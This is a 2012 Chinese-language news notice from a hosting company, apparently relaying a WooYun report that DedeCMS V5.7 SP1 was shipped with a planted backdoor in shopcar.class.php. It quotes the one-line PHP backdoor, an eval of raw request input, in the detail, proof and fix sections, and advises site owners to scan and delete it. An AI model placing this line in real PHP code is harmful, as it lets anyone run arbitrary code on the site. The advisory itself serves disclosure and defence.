天互数据

登录

新闻资讯 NEWS

实时发布天互官方新闻和媒体报道,了解天互最新动态

当前位置:新闻资讯 > 天互公告 > 正文
Mar
2012 21

Dedecms疑似被植入后门 希望各网站及时进行扫描确认

  • 时间:2012/3/21 15:00:05
  • 阅读:726326次

  昨日乌云漏洞报告平台(http://www.wooyun.org/)发布漏洞报告,称国内知名开源CMS软件Dedecms被入侵种植后门,影响使用dedecms的网站和企业,后门代码在/include/shopcar.class.php中,希望直接使用dedecms又未作审计的网站速度处理。360网站安全检测官方微博称经过工程师的测试,可以上传PHP后门来控制整个网站。目前已经将该后门加入到webscan网站安全扫描平台扫描库中,希望各网站及时进行扫描确认。

  织梦内容管理系统(DedeCms)早期由IT柏拉图个人开发, 以简单、实用、开源闻名,受到广大个人站长的青睐。DedeCms站长用户众多,目前其官方还未对漏洞做出回应。希望广大使用Dedecms的站长能及时对网站进行安全检测,做好漏洞防范,等待官方给出解决办法。

  漏洞概要

  缺陷编号: WooYun-2012-05416

  漏洞标题: Dedecms疑似被植入后门

  相关厂商: Dedecms

  漏洞作者: jsbug

  提交时间: 2012-03-20

  公开时间: 2012-03-20

  漏洞类型: 成功的入侵事件

  危害等级: 高

  自评Rank: 10

  漏洞状态: 未联系到厂商或者厂商积极忽略

  漏洞来源: http://www.wooyun.org

  分享漏洞: 腾讯微博 新浪微博 Twitter 网易微博 豆瓣

  漏洞详情

  披露状态:

  2012-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开

  2012-03-20: 厂商已经主动忽略漏洞,细节向公众公开

  简要描述:

  DedeCMS V5.7 SP1正式版

  UTF-8 GBK版本疑似被植入一句话后门

  前几日下载并不存在此代码

  详细说明:

  shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

  

  漏洞证明:

  shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

  

  修复方案:

  删除@eval(file_get_contents('php://input'));

——THE END——

上一篇: 分类信息网站疯狂“烧钱”并没有找到合适的盈利模式

下一篇: 重要公告|关于公司话务系统中心线路故障的公告

为你推荐
天互数据助力成长
  • 售前咨询电话

    400-675-6239

  • 在线客服

    在线客服,立即响应

  • 建议反馈

    天互数据渴望您的建议

          关注天互数据      关注百度智能云服务中心

咨询热线
400-675-6239

关注微信公众号

公司地址:陕西省西安市高新区科技路50号金桥国际广场A座2单元21702号
邮编:710116

在线客服

电话咨询

扫码咨询